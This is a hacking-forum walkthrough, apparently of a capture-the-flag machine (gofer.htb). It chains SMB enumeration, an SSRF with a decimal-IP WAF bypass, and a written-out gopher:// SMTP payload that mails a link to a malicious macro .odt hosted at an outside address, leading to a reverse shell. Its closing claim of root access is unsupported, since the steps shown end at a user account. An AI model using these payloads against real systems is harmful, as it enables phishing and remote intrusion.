• Join CraxPro and earn real money through our Credit Rewards System. Participate and redeem credits for Bitcoin/USDT. Start earning today!
    Read the detailed thread here

Live Hacking : Analyzing and hacking a website to get root access

Currently reading:
 Live Hacking : Analyzing and hacking a website to get root access

Kingothmen

Member
LV
2
Joined
Mar 31, 2023
Threads
110
Likes
137
Awards
7
Credits
9,126©
Cash
0$
:ban: Hello Today we will hack this website :kek:
1
we start with a nmap scan. We found out that there were 8 ports open.:feelsrageman:
1

Since, there is an smb port open, let’s dig in whatever is inside there with the help of smbmap.:kek:
2

A share named “shares” can be accessed with a null session. On connecting to the share, a .backup directory was found which had a mail named file in it.:ez:
3

And downloaded the mail file.:hehe:

4

Upon reading the content of the mail, it is found that a user named Jocelyn is susceptible to a phishing attack and has habit of clicking on links. Also, now the important documents would be sent internally by mail and would be using .odt format for documents. Also, it has a web proxy and is less restrictive.:pepejuice:
5

Upon visiting the ip it was found to be redirecting to gofer.htb. Hence was added to /etc/hosts. Then upon visiting the website, there was nothing peculiar that we could be fond of. So, tried to search for a sub-domain and found one named proxy as suggested in the mail which was also added to the /etc/hosts file.
6

But visiting the site, it greets with a login page. Also trying some common words to login didn’t work out.
7

Upon testing common directories and files only index.php returned positive. Upon verb tampering, it resulted on giving up different result stating “Missing URL parameter !”.
8

So, as stated earlier in the mail, it might be a SSRF. And could prove that it definitely is.
9

SMB → Mail Crafting
So, as found in the earlier mail, we could access the internal mail server through this vulnerability and get the RCE. But first we need to craft a .odt exploit and send through mail to Jocelyn Hudson (username jhudson as seen in the mail and user naming convention) and from the website .
10

11

Based on the response of the box as well as the box name, it could be assumed that a gopher:// protocol is used to send files to other users.
The following github repo could help us create the payload that is required.
But somehow the payload created just didn’t work. Upon careful examination, in the blog from infosecwriteups, since the email is sent internally, the mail needs to be sent using the application internally rather than just sending the email. So, the payload needs to be crafted carefully as shown in the blog. Also, the system had WAF enabled which had us on our heels which filtered /127 as well which was used for getting the localhost and was changed to 2130706433 which is also resolved as 127.0.0.1.
12

13

The final piece in the puzzle was to register ‘Enter’ key in the application and which could be achieved through \r\n.

Our payload:
gopher://2130706433:25/xHELO \r\n
MAIL FROM:<smaharjan@**********.com> \r\n
RCPT TO:<jhudson@**********.com> \r\n
DATA \r\n
From: <smaharjan@**********.com> \r\n
To: <jhudson@**********.com> \r\n
Subject: TestingTesting \r\n
\r\n
<a href='http://10.10.16.6/test.odt>hello</a> \r\n
. \r\n
QUIT \r\n

The following is the final payload for the execution.

gopher://2130706433:25/xHELO%250d%250aMAIL%20FROM%3A%3Csmaharjan@******.com%3E%250d%250aRCPT%20TO%3A%3Cjhudson@gofer.htb%3E%250d%250aDATA%250d%250aFrom%3A%20%3Csmaharjan@gofer.htb%3E%250d%250aTo%3A%20%3Cjhudson@gofer.htb%3E%250d%250a%250d%250aSubject%3A%20TestingTesting%250d%250a%250d%250a<a+href%3d'http%3a//10.10.16.6/test.odt>hello</a>%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a

Upon sending the request, the response OK was received.
14


Document → RCE

For creating the malicious .odt file, it could be achieved through macro as it would execute certain functions, codes within it upon running the file.
The following macro was created inside the file.

15

Then the vulnerability was triggered which requested for the file and got the reverse-shell.
16

17

jhudson →tbuckley

Upon looking at the processes running inside the machine, found the credentials for user tbuckley being passed.

18

— snip —
19

Successfully logged on the user tbuckley. :pepeclap::hyperwow:
20



:ricardo:That's all. We hacked the site and now we own the root access !:ricardo:

You can contact me if you have any question 😜
***********************************************************************************************************************************************
**********************************************************************************************************************************************


Capture


2


6


7


9


17


20


20
 
Last edited:
  • Like
Reactions: baba-yaga

Create an account or login to comment

You must be a member in order to leave a comment

Create account

Create an account on our community. It's easy!

Log in

Already have an account? Log in here.

Tips

Similar threads

Top Bottom